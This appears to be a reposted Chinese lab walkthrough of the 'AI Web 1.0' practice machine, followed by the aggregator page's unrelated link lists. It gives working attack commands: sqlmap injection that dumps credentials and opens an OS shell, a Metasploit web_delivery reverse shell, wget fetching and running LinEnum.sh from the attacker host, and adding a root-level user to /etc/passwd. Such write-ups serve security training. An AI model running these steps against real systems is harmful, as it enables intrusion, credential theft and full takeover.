zoukankan
html css js c++ java
AI Web 1.0
kali:192.168.0.103
目标机:192.168.0.105
0X01 端口和目录扫描
打开目标主页没有任何信息
a) 端口扫描
只有一个80端口开启
b) 目录扫描
0x03 查看敏感目录robots
访问敏感目录地址
两个目录都没有权限访问
尝试继续挖掘
在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息
在
http://192.168.0.105/se3reTdir777/uploads/
没有挖到任何目录,此时回过头来看看上一级目录是什么
是一个查看信息输入框。
结合现在所得到的信息,能想到的只有输入框是否有sql注入
0X04 SQL注入
a) 验证漏洞是否存在
将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的
b) sqlmap跑数据库
抓包生成re.txt文件
运行sqlmap
sqlmap -r /root/re.txt --dbs --batch
最终得到的数据库账号密码
sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch
由此我们得到了凭证
0X05 sqlmap get webshell
sqlmap -r /root/re.txt --os-shell
这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息
网站根路径/home/www/html/web1x443290o2sdf92213
出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功
0X06 系统提权
a) 反弹交互式shell
使用命令执行的方式获取反弹shell
use exploit/multi/script/web_delivery
b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)
cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp
执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行
c) 编辑passwd文件 添加root权限用户
perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
切换用户 su test
密码 password@123
查看全文
相关阅读:
Keep it simple & stupid
BZOJ 2631: tree( LCT )
BZOJ 2843: 极地旅行社( LCT )
BZOJ 2002: [Hnoi2010]Bounce 弹飞绵羊( LCT )
BZOJ 1742: [Usaco2005 nov]Grazing on the Run 边跑边吃草( dp )
BZOJ 3531: [Sdoi2014]旅行( 树链剖分 )
BZOJ 1269: [AHOI2006]文本编辑器editor( splay )
BZOJ 2016: [Usaco2010]Chocolate Eating( 二分答案 )
BZOJ 1734: [Usaco2005 feb]Aggressive cows 愤怒的牛( 二分答案 )
BZOJ 2101: [Usaco2010 Dec]Treasure Chest 藏宝箱( dp )
原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
最新文章
HDU-3572-Task Schedule
TSINGSEE青犀视频开发的H265播放器EasyPlayerPro-Win版自定义水印添加方法说明
TSINGSEE青犀视频开发的H265播放器EasyPlayerPro-win版如何自主修改ICON图标?
TSINGSEE青犀视频开发H265播放器控制台报Uncaught ReferenceError: callbackfun is not definedat错误排查
WebRTC开源平台编译的网页视频远程通话会议平台EasyRTC如何确认网页是否可以正常获取摄像头设备?
【开发记录】国标GB28181协议视频人脸识别/车牌识别平台EasyCVR添加实时快照接口
国标GB28181协议视频人脸识别/车牌识别平台EasyCVR设定好录像计划重启后通道不录像原因排查
国标GB28181协议视频人脸识别/车牌识别平台EasyCVR录像计划关闭无效问题排查
【操作说明 】GB28181/RTSP/SDK/Ehome协议安防视频融合平台EasyCVR新增用户管理功能操作介绍
【解决方案】智慧工地AI视频远程集中监控解决方案是如何通过EasyCVR视频平台实现的?
热门文章
RTSP/GB28181/HIKSDK/Ehome视频协议融合平台EasyCVR加密机授权报license key not found问题排查
Codeforces Round #138 (Div. 2) A. Parallelepiped
codeforces Codeforces Round #273 (Div. 2) 478B
算法:插入排序
codeforces 的 Codeforces Round #273 (Div. 2) --C Table Decorations
SDUT OJ 2088 refresh的停车场
有待总结的KMP算法 sdut oj 2463 学密码学一定得学程序
POJ 3278 Catch That Cow
Ubuntu下codeblocks编译器程序执行对话框内能进行粘贴编辑操作的指令
矩阵左旋90度
Copyright © 2011-2022 走看看